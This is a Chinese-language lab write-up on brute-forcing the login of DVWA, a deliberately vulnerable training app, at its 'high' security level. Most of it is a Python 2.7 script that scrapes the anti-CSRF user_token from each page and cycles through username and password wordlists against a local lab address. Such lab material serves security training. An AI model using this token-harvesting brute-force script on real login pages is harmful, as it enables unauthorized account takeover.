DVWA Brute Force漏洞利用(Security Level : high)

由于加入了Anti-CSRFtoken预防无脑爆破，这里就不推荐用Burpsuite了，还是简单用python写个脚本吧。

借用lonehand脚本（python 2.7），用户名为admin，对password参数进行爆破并打印结果，但因为版本问题，获取user_token时需要做出相应调整。调整结果如下：(在原基础上修改了TOKEN获取方式，增加了用户名猜解)

from bs4 import BeautifulSoup
import urllib2
header={
    'Host': '192.168.31.119',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://192.168.31.119/DVWA-master/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=2afb7fbff91b87660e18dcd0ab1d0ea5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'}
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    d = soup.find_all('input', attrs={'name':'user_token'})
    user_token = d[0].attrs['value']
    return user_token

user_token = get_token(requrl,header)
i=0
for userline in open("user.lst"):
    for line in open("pass.lst"):
        requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"+"?username="+userline.strip()+"&password="+line.strip()+"&Login=Login&user_token="+user_token
        i = i + 1
        print i,userline.strip(),line.strip(), 
        user_token = get_token(requrl,header)